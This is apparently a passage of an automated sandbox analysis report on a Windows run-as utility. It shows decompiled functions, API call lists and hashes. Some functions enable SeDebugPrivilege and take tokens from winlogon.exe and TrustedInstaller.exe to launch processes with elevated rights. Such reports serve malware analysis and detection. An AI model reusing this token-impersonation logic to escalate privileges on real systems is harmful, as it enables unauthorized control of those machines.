				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                      0x00408533
                                                                                      0x00408533
                                                                                      0x00408536
                                                                                      0x0040853e
                                                                                      0x00408546
                                                                                      0x0040854d
                                                                                      0x00408559
                                                                                      0x00408563
                                                                                      0x00408569
                                                                                      0x00408572
                                                                                      0x00408583
                                                                                      0x0040858d
                                                                                      0x00408595
                                                                                      0x0040859e
                                                                                      0x004085a2
                                                                                      0x004085a6
                                                                                      0x004085aa
                                                                                      0x004085ae
                                                                                      0x004085b8
                                                                                      0x004085c1
                                                                                      0x004085c8
                                                                                      0x004085cd
                                                                                      0x004085cf
                                                                                      0x0040867f
                                                                                      0x00408688
                                                                                      0x0040868d
                                                                                      0x0040868f
                                                                                      0x00408730
                                                                                      0x00408735
                                                                                      0x00408737
                                                                                      0x0040873d
                                                                                      0x00408750
                                                                                      0x0040875d
                                                                                      0x00408763
                                                                                      0x00408770
                                                                                      0x00408775
                                                                                      0x00408779
                                                                                      0x0040878b
                                                                                      0x00408790
                                                                                      0x004087a2
                                                                                      0x004087aa
                                                                                      0x004087b8
                                                                                      0x004087be
                                                                                      0x004087c3
                                                                                      0x004087c9
                                                                                      0x004087d2
                                                                                      0x004087df
                                                                                      0x004087e3
                                                                                      0x004087e6
                                                                                      0x00408801
                                                                                      0x004087e8
                                                                                      0x004087f8
                                                                                      0x004087fe
                                                                                      0x00408811
                                                                                      0x00408816
                                                                                      0x00408816
                                                                                      0x0040881c
                                                                                      0x00408822
                                                                                      0x00408779
                                                                                      0x00408824
                                                                                      0x00408829
                                                                                      0x00408833
                                                                                      0x00408834
                                                                                      0x00408840
                                                                                      0x00408848
                                                                                      0x0040884c
                                                                                      0x00408850
                                                                                      0x00408855
                                                                                      0x0040885a
                                                                                      0x00408860
                                                                                      0x004088ac
                                                                                      0x004088b1
                                                                                      0x004088b3
                                                                                      0x004088bf
                                                                                      0x004088c5
                                                                                      0x004088cb
                                                                                      0x004088da
                                                                                      0x004088ea
                                                                                      0x004088ed
                                                                                      0x004088f8
                                                                                      0x004088ff
                                                                                      0x00408905
                                                                                      0x004088b5
                                                                                      0x004088b5
                                                                                      0x004088b5
                                                                                      0x00000000
                                                                                      0x00408862
                                                                                      0x00408862
                                                                                      0x0040886d
                                                                                      0x00408874
                                                                                      0x0040887b
                                                                                      0x00408882
                                                                                      0x00408889
                                                                                      0x00408895
                                                                                      0x00408897
                                                                                      0x00408658
                                                                                      0x00408658
                                                                                      0x0040865d
                                                                                      0x00408661
                                                                                      0x0040866a
                                                                                      0x00408673
                                                                                      0x00408678
                                                                                      0x00000000
                                                                                      0x00408678
                                                                                      0x00408860
                                                                                      0x00408695
                                                                                      0x00408695
                                                                                      0x0040869f
                                                                                      0x004086a2
                                                                                      0x004086af
                                                                                      0x004086a4
                                                                                      0x004086a7
                                                                                      0x004086a7
                                                                                      0x004086b4
                                                                                      0x004086bf
                                                                                      0x004086cb
                                                                                      0x004086d3
                                                                                      0x004086d7
                                                                                      0x004086db
                                                                                      0x004086e0
                                                                                      0x004086f1
                                                                                      0x004086f8
                                                                                      0x004086ff
                                                                                      0x00408706
                                                                                      0x0040870d
                                                                                      0x00408719
                                                                                      0x0040871b
                                                                                      0x00000000
                                                                                      0x0040871b
                                                                                      0x004085d5
                                                                                      0x004085da
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004085ec
                                                                                      0x004085ef
                                                                                      0x004085f6
                                                                                      0x004085fd
                                                                                      0x00408604
                                                                                      0x0040860b
                                                                                      0x00408612
                                                                                      0x00408616
                                                                                      0x00408620
                                                                                      0x0040862a
                                                                                      0x00408632
                                                                                      0x00408633
                                                                                      0x00408638
                                                                                      0x0040864f
                                                                                      0x00408651
                                                                                      0x00000000
                                                                                      0x0040854f
                                                                                      0x0040854f
                                                                                      0x00408550
                                                                                      0x00408556
                                                                                      0x00408556

                                                                                      APIs
                                                                                        • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                        • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                        • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                        • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                      • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                      • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                      • swscanf.MSVCRT ref: 00408620
                                                                                      • _wtoi.MSVCRT ref: 00408633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                      • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                      • API String ID: 3933224404-3784219877
                                                                                      • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                      • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                      • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                      • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 81%
                                                                                      			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                      0x00401fe6
                                                                                      0x00401ff1
                                                                                      0x00401ff3
                                                                                      0x00401fff
                                                                                      0x00402002
                                                                                      0x004020a8
                                                                                      0x004020ab
                                                                                      0x004020f3
                                                                                      0x004020f6
                                                                                      0x00402162
                                                                                      0x00402165
                                                                                      0x004021f2
                                                                                      0x004021f5
                                                                                      0x00402235
                                                                                      0x00402238
                                                                                      0x004022be
                                                                                      0x0040223a
                                                                                      0x0040223a
                                                                                      0x00402240
                                                                                      0x0040224b
                                                                                      0x0040224e
                                                                                      0x00402251
                                                                                      0x00402254
                                                                                      0x00402259
                                                                                      0x0040225e
                                                                                      0x00402262
                                                                                      0x00402264
                                                                                      0x00402264
                                                                                      0x00402264
                                                                                      0x00402262
                                                                                      0x00402266
                                                                                      0x0040226c
                                                                                      0x00402271
                                                                                      0x00402274
                                                                                      0x00402276
                                                                                      0x0040229a
                                                                                      0x0040229a
                                                                                      0x00402278
                                                                                      0x00402296
                                                                                      0x00402296
                                                                                      0x0040229c
                                                                                      0x0040229c
                                                                                      0x004022c0
                                                                                      0x004022c2
                                                                                      0x004022c8
                                                                                      0x004022c8
                                                                                      0x004022c8
                                                                                      0x00000000
                                                                                      0x004022c0
                                                                                      0x00402201
                                                                                      0x00402203
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402220
                                                                                      0x00402225
                                                                                      0x00402227
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040222d
                                                                                      0x00000000
                                                                                      0x0040222d
                                                                                      0x00402173
                                                                                      0x00402179
                                                                                      0x0040217b
                                                                                      0x0040217e
                                                                                      0x00402183
                                                                                      0x00402185
                                                                                      0x00402188
                                                                                      0x0040218d
                                                                                      0x0040218f
                                                                                      0x00402192
                                                                                      0x004021a2
                                                                                      0x004021a7
                                                                                      0x004021a9
                                                                                      0x004021ac
                                                                                      0x004021cc
                                                                                      0x004021d1
                                                                                      0x004021d3
                                                                                      0x004021db
                                                                                      0x004021db
                                                                                      0x004021e1
                                                                                      0x004021e1
                                                                                      0x004021e7
                                                                                      0x004021e7
                                                                                      0x00000000
                                                                                      0x00402192
                                                                                      0x004020fe
                                                                                      0x00402103
                                                                                      0x00402105
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402111
                                                                                      0x00402114
                                                                                      0x00000000
                                                                                      0x00402114
                                                                                      0x004020ad
                                                                                      0x004020b4
                                                                                      0x004020b9
                                                                                      0x004020bc
                                                                                      0x00000000
                                                                                      0x004020c2
                                                                                      0x004020c4
                                                                                      0x004020ce
                                                                                      0x004020d0
                                                                                      0x004020d3
                                                                                      0x004020d4
                                                                                      0x004020d5
                                                                                      0x004020e6
                                                                                      0x004020e7
                                                                                      0x004020d7
                                                                                      0x004020d7
                                                                                      0x004020dd
                                                                                      0x004020de
                                                                                      0x004020df
                                                                                      0x004020df
                                                                                      0x004020ec
                                                                                      0x004020ef
                                                                                      0x00000000
                                                                                      0x004020ef
                                                                                      0x00402008
                                                                                      0x00402016
                                                                                      0x0040201d
                                                                                      0x0040202e
                                                                                      0x00402035
                                                                                      0x00402044
                                                                                      0x00402049
                                                                                      0x00402055
                                                                                      0x00402064
                                                                                      0x00402068
                                                                                      0x0040206e
                                                                                      0x0040208b
                                                                                      0x00402070
                                                                                      0x00402082
                                                                                      0x00402088
                                                                                      0x0040209e
                                                                                      0x004020a1
                                                                                      0x00402119
                                                                                      0x00402119
                                                                                      0x0040211b
                                                                                      0x0040211e
                                                                                      0x0040211e
                                                                                      0x00402149
                                                                                      0x00402151
                                                                                      0x00402151
                                                                                      0x00402157
                                                                                      0x00402157
                                                                                      0x004022cb
                                                                                      0x004022d2
                                                                                      0x004022d2

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040201D
                                                                                      • memset.MSVCRT ref: 00402035
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00402050
                                                                                      • wcslen.MSVCRT ref: 0040205F
                                                                                      • wcslen.MSVCRT ref: 004020B4
                                                                                      • _wtoi.MSVCRT ref: 004020D7
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                      • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                      • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                        • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                        • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                        • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                        • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                        • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      • wcschr.MSVCRT ref: 00402259
                                                                                      • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                      • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                      • API String ID: 3201562063-2355939583
                                                                                      • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                      • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                      0x00409924
                                                                                      0x0040992c
                                                                                      0x00409937
                                                                                      0x0040993f
                                                                                      0x0040994a
                                                                                      0x00409956
                                                                                      0x00409962
                                                                                      0x0040996e
                                                                                      0x00409971
                                                                                      0x00409973
                                                                                      0x00000000
                                                                                      0x00409976
                                                                                      0x00409977

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1529661771-70141382
                                                                                      • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                      • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                      • String ID:
                                                                                      • API String ID: 2827331108-0
                                                                                      • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                      • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
